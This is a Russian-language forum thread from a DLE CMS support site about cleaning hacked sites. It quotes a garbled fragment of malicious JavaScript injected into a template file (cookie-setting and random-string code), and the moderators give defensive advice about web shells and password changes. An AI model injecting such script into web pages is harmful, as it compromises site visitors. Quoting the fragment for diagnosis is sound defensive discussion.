Перейти к публикации

Появился вредоносный код.


Рекомендованные сообщения

Приветствую Вас !

Сайт onlinfilm-hd.ru DLE 10

Мне пришло сообщение от Яндекс(а), что на страницах вашего сайта обнаружен потенциально опасный код.

Вот он.

var expiresDate = new Date(); expiresDate.se

tTime(expiresDate.getTime() + 432000000); setTimeout(function() { document.cookie = 'ifTh50Dl=yes; path=/; expires=' + expiresDate; }, 5000);}};function genstrdom(length) {var st = '';var chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';for (i=1;i<length;i++) {var c = Math.floor(Math.random()*chars.length + 1);st += chars.charAt©}return st;}

Я нашел его в /templates/s/jquery.jmpopups-0.5.1.js и удалил. Через пару дней опять та же самая история.

У меня на сайте пользователи могут регистрироваться, не могут добавлять новости, но могут загружать аватар.

Подскажите пожалуйста, что мне предпринять против этой тенденции ? Меня интересуют действующие способы.

P.S. Может кто знает чем занимается этот код.

Спасибо.

Изменено пользователем vladimkrav
Ссылка на сообщение
Поделиться на других сайтах

vladimkrav,

В админпанели смотрите в разделе "Список действий в админпанели" кто вам редактировал шаблоны, если там нет данной записи, то значит изменили вам файл не через DLE. А например через украденный доступ по FTP, шелл на сервере или другие уязвимости серверного ПО. И уже в зависимости от ситуации уже предпринимать необходимые действия, это и смена всех паролей, и смотрите наличие шелла, а это может быть любой сторонний файл php не имеющий отношения к оригинальному DLE, и обновление серверного ПО до актуальных версий.

Ссылка на сообщение
Поделиться на других сайтах

Встроенный антивирус ничего не нашел. Он проверяет шаблон ? Чем еще можно проверить движок на наличие шел(а) ?

Название у шел(а) может быть любое ?

Изменено пользователем vladimkrav
Ссылка на сообщение
Поделиться на других сайтах

Встроенный антивирус ничего не нашел. Он проверяет шаблон ?

На наличие посторонних файлов или того кода что вы написали? На наличие посторонних php файлов шаблон проверяется.

Название у шел(а) может быть любое ?

Абсолютно любое

Ссылка на сообщение
Поделиться на других сайтах
  • 3 недели спустя...

Здравствуйте.

Я абсолютный новичок,посему прошу помощи.Любая подсказка.....заранее буду благодарна!

Зашла в админку сайта,не пускает в разделы НАСТРОЙКА СИСТЕМЫ и СПИСОК ВСЕХ РАЗДЕЛОВ.Выдает вот эту надпись:

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/vhosts/dialexiscook.ru/httpdocs/engine/inc/options.php on line 1223

В службе поддержки хостинга сказали,что сайт взломан и загружен вредоносный код.Если не почищу,не переустановлю движок,заблокируют.

Подскажите,я сама смогу что-то сделать или это всё?

Ссылка на сообщение
Поделиться на других сайтах

Dialexis,

У вас на сайте стоит нелегальная копия скрипта скачанная неизвестно где, плюс шаблон с внедренными вирусами.

Любая подсказка.....заранее буду благодарна!

Здесь не оказывают помощи по нелегальным копиям скрипта.

Ссылка на сообщение
Поделиться на других сайтах
Гость
Эта тема закрыта для публикации сообщений.
×
×
  • Создать...